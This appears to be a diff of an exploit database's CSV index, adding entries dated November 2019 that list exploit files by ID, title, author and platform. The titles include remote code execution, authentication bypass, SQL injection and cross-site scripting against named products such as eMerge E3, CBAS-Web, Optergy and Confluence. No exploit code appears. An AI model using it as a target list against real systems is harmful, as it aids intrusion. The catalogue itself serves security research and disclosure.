47605,exploits/windows/local/47605.txt,"Alps HID Monitor Service 8.1.0.10 - 'ApHidMonitorService' Unquote Service Path",2019-11-11,"Héctor Gabriel Chimecatl Hernández",local,windows,
47606,exploits/xml/local/47606.txt,"XML Notepad 2.8.0.4 - XML External Entity Injection",2019-11-11,daejinoh,local,xml,
+47615,exploits/windows/local/47615.txt,"Acronis True Image OEM 19.0.5128 - 'afcdpsrv' Unquoted Service Path",2019-11-12,"Alejandra Sánchez",local,windows,
+47617,exploits/windows/local/47617.txt,"Wondershare Application Framework Service 2.4.3.231 - 'WsAppService' Unquote Service Path",2019-11-12,chuyreds,local,windows,
+47637,exploits/windows/local/47637.txt,"Alps Pointing-device Controller 8.1202.1711.04 - 'ApHidMonitorService' Unquoted Service Path",2019-11-12,"Mario Rodriguez",local,windows,
+47642,exploits/windows/local/47642.txt,"RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path",2019-11-12,chuyreds,local,windows,
+47645,exploits/windows/local/47645.py,"Control Center PRO 6.2.9 - Local Stack Based Buffer Overflow (SEH)",2019-11-12,sasaga92,local,windows,
+47647,exploits/windows/local/47647.txt,"Wondershare Application Framework Service - _WsAppService_ Unquote Service Path",2019-11-12,chuyreds,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17773,6 +17779,9 @@ id,file,description,date,author,type,platform,port
47573,exploits/multiple/remote/47573.rb,"Nostromo - Directory Traversal Remote Command Execution (Metasploit)",2019-11-01,Metasploit,remote,multiple,
47576,exploits/windows/remote/47576.py,"Ayukov NFTP client 1.71 - 'SYST' Buffer Overflow",2019-11-04,SYANiDE,remote,windows,
47602,exploits/linux/remote/47602.rb,"rConfig - install Command Execution (Metasploit)",2019-11-08,Metasploit,remote,linux,
+47625,exploits/hardware/remote/47625.py,"eMerge E3 Access Controller 4.6.07 - Remote Code Execution",2019-11-12,LiquidWorm,remote,hardware,
+47626,exploits/hardware/remote/47626.rb,"eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit)",2019-11-12,LiquidWorm,remote,hardware,
+47629,exploits/hardware/remote/47629.txt,"CBAS-Web 19.0.0 - Information Disclosure",2019-11-12,LiquidWorm,remote,hardware,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41890,6 +41899,10 @@ id,file,description,date,author,type,platform,port
47498,exploits/php/webapps/47498.txt,"Kirona-DRS 5.5.3.5 - Information Disclosure",2019-10-14,Ramikan,webapps,php,
47501,exploits/php/webapps/47501.txt,"Bolt CMS 3.6.10 - Cross-Site Request Forgery",2019-10-15,r3m0t3nu11,webapps,php,
47505,exploits/php/webapps/47505.txt,"Accounts Accounting 7.02 - Persistent Cross-Site Scripting",2019-10-16,"Debashis Pal",webapps,php,
+47612,exploits/hardware/webapps/47612.py,"Prima FlexAir Access Control 2.3.38 - Remote Code Execution",2019-11-12,LiquidWorm,webapps,hardware,
+47613,exploits/aspx/webapps/47613.txt,"Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting",2019-11-12,Cy83rl0gger,webapps,aspx,
+47614,exploits/hardware/webapps/47614.txt,"Computrols CBAS-Web 19.0.0 - 'username' Reflected Cross-Site Scripting",2019-11-12,LiquidWorm,webapps,hardware,
+47611,exploits/aspx/webapps/47611.txt,"Adrenalin Core HCM 5.4.0 - 'strAction' Reflected Cross-Site Scripting",2019-11-12,Cy83rl0gger,webapps,aspx,
47516,exploits/php/webapps/47516.txt,"Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
47517,exploits/php/webapps/47517.txt,"Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
47518,exploits/php/webapps/47518.txt,"Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
@@ -41927,3 +41940,27 @@ id,file,description,date,author,type,platform,port
47598,exploits/java/webapps/47598.py,"Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting",2019-11-08,vesche,webapps,java,
47600,exploits/php/webapps/47600.py,"Adive Framework 2.0.7 - Privilege Escalation",2019-11-08,"Pablo Santiago",webapps,php,
47603,exploits/php/webapps/47603.txt,"Nextcloud 17 - Cross-Site Request Forgery",2019-11-08,"Ozer Goker",webapps,php,
+47616,exploits/hardware/webapps/47616.txt,"eMerge E3 1.00-06 - Unauthenticated Directory Traversal",2019-11-12,LiquidWorm,webapps,hardware,
+47618,exploits/hardware/webapps/47618.txt,"eMerge E3 1.00-06 - Privilege Escalation",2019-11-12,LiquidWorm,webapps,hardware,
+47619,exploits/hardware/webapps/47619.py,"eMerge E3 1.00-06 - Remote Code Execution",2019-11-12,LiquidWorm,webapps,hardware,
+47620,exploits/hardware/webapps/47620.txt,"eMerge E3 1.00-06 - Cross-Site Request Forgery",2019-11-12,LiquidWorm,webapps,hardware,
+47621,exploits/jsp/webapps/47621.py,"Atlassian Confluence 6.15.1 - Directory Traversal",2019-11-12,max7253,webapps,jsp,
+47622,exploits/hardware/webapps/47622.py,"eMerge E3 1.00-06 - Arbitrary File Upload",2019-11-12,LiquidWorm,webapps,hardware,
+47623,exploits/hardware/webapps/47623.txt,"eMerge E3 1.00-06 - 'layout' Reflected Cross-Site Scripting",2019-11-12,LiquidWorm,webapps,hardware,
+47624,exploits/hardware/webapps/47624.sh,"eMerge50P 5000P 4.6.07 - Remote Code Execution",2019-11-12,LiquidWorm,webapps,hardware,
+47627,exploits/hardware/webapps/47627.py,"CBAS-Web 19.0.0 - Remote Code Execution",2019-11-12,LiquidWorm,webapps,hardware,
+47628,exploits/hardware/webapps/47628.txt,"CBAS-Web 19.0.0 - Cross-Site Request Forgery (Add Super Admin)",2019-11-12,LiquidWorm,webapps,hardware,
+47630,exploits/hardware/webapps/47630.txt,"CBAS-Web 19.0.0 - Username Enumeration",2019-11-12,LiquidWorm,webapps,hardware,
+47631,exploits/php/webapps/47631.txt,"CBAS-Web 19.0.0 - 'id' Boolean-based Blind SQL Injection",2019-11-12,LiquidWorm,webapps,php,
+47632,exploits/php/webapps/47632.txt,"Joomla 3.9.13 - 'Host' Header Injection",2019-11-12,"Pablo Santiago",webapps,php,
+47633,exploits/alpha/webapps/47633.txt,"Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting",2019-11-12,LiquidWorm,webapps,alpha,
+47634,exploits/hardware/webapps/47634.txt,"Prima Access Control 2.3.35 - Arbitrary File Upload",2019-11-12,LiquidWorm,webapps,hardware,
+47635,exploits/jsp/webapps/47635.rb,"Atlassian Confluence 6.15.1 - Directory Traversal (Metasploit)",2019-11-12,max7253,webapps,jsp,
+47636,exploits/hardware/webapps/47636.txt,"Optergy 2.3.0a - Remote Code Execution",2019-11-12,LiquidWorm,webapps,hardware,
+47638,exploits/hardware/webapps/47638.sh,"FlexAir Access Control 2.4.9api3 - Remote Code Execution",2019-11-12,LiquidWorm,webapps,hardware,
+47639,exploits/hardware/webapps/47639.txt,"Optergy 2.3.0a - Cross-Site Request Forgery (Add Admin)",2019-11-12,LiquidWorm,webapps,hardware,
+47640,exploits/hardware/webapps/47640.txt,"Optergy 2.3.0a - Username Disclosure",2019-11-12,LiquidWorm,webapps,hardware,
+47641,exploits/hardware/webapps/47641.py,"Optergy 2.3.0a - Remote Code Execution (Backdoor)",2019-11-12,LiquidWorm,webapps,hardware,
+47643,exploits/aspx/webapps/47643.txt,"Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting",2019-11-12,Cy83rl0gger,webapps,aspx,
+47644,exploits/hardware/webapps/47644.py,"FlexAir Access Control 2.3.35 - Authentication Bypass",2019-11-12,LiquidWorm,webapps,hardware,
+47648,exploits/hardware/webapps/47648.txt,"Bematech Printer MP-4200 - Denial of Service",2019-11-12,"Jonatas Fil",webapps,hardware,